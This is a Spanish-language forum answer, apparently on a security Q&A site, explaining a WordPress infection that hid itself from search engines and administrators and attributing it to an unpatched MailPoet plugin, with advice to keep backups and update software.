El código anterior es capaz de evadir la detección por parte de los principales motores de búsqueda y el administrador del sitio, ya que devuelve una página normal cuando se cumplen ciertos criterios. No puedo averiguar qué código se está agregando posiblemente porque el servidor de hospedaje de malware también verifica si la solicitud proviene de un servidor infectado.

Parece que una vulnerabilidad de WordPress fue introducida por una versión sin parches del complemento MailPoet. Esto permite que un atacante cargue un script malicioso con credenciales de administrador en un tema de WordPress y ejecute ese archivo navegando a su URL. Puede encontrar más información en este blog de seguridad.

La conclusión clave de este incidente es hacer copias de seguridad de sus datos con frecuencia y mantener su software actualizado con diligencia.

    
respondido por el Question Overflow 20.10.2014 - 06:13
